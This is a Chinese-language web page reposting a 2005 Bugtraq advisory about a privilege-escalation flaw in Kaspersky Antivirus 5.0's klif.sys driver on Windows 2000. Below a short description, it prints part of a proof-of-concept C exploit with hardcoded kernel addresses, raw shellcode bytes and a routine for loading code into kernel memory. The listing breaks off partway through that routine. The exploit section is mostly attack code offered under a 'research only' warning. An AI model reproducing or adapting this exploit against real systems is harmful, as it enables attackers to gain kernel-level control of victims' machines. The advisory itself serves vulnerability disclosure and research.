Kaspersky杀毒软件klif.sys权限提升漏洞

2005-06-12   作者:郁郁小蝎   来源:中国站长学院   浏览:7451   评论:0

受影响系统:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227
描述:
------------------------------------------
BUGTRAQ  ID: _blank>13878

Kaspersky是一款非常流行的杀毒软件。

Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限,攻击者可能利用这个漏洞以系统内核的权限执行任意代码。

<*来源:Ilya Rabinovich (info@softsphere.com)
 
 链接:_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

测试方法:
------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

//(C) by Ilya Rabinovich.

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00,    //push 0x200
\t\t    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address> - 0xBE938000
\t\t    0x6A,0x00,\t\t    //push 0  
\t\t    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<GetModuleFileNameA> -> +13
\t\t    0xFF,0xD0,\t\t    //call eax
\t\t    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address>
\t\t    0x68,0x00,0x82,0x93,0xBE,    //push <address of the notepad path>- 0xBE938200
\t\t    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<lstrcmpiA> -> +30
\t\t    0xFF,0xD0,\t\t    //call eax
\t\t    0x85,0xC0,\t\t    //test eax,eax
\t\t    0x74,0x03,\t\t    //je +03
\t\t    0xC2,0x04,0x00,\t\t//retn 4
\t\t    0x6A,0x00,\t\t    //push 0
\t\t    0x68,0x00,0x84,0x93,0xBE,    //push <address of the message string>- 0xBE938400
\t\t    0x68,0x00,0x84,0x93,0xBE,    //push <address of the message string>- 0xBE938400
\t\t    0x6A,0x00,\t\t    //push 0
\t\t    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<MessageBoxA> -> +58
\t\t    0xFF,0xD0,\t\t    //call eax
\t\t    0xC2,0x04,0x00\t\t//retn 4
\t\t    };

unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt \
[0xBE9372B0]

//////////////////////////////////////////////////////////////

BOOLEAN LoadExploitIntoKernelMemory(void){



//Get function's addresses

   HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
   HANDLE hUser=GetModuleHandle("USER32.DLL");

   FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
   FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

   FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

   *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
   *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
   *(DWORD*)(code+58)=(DWORD)pMessageBoxA;

Tags:责任编辑:cvery
顶一下(56)
88.89%

网友评论已有 0 人参与评论  

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!
  验证码:     登录   注册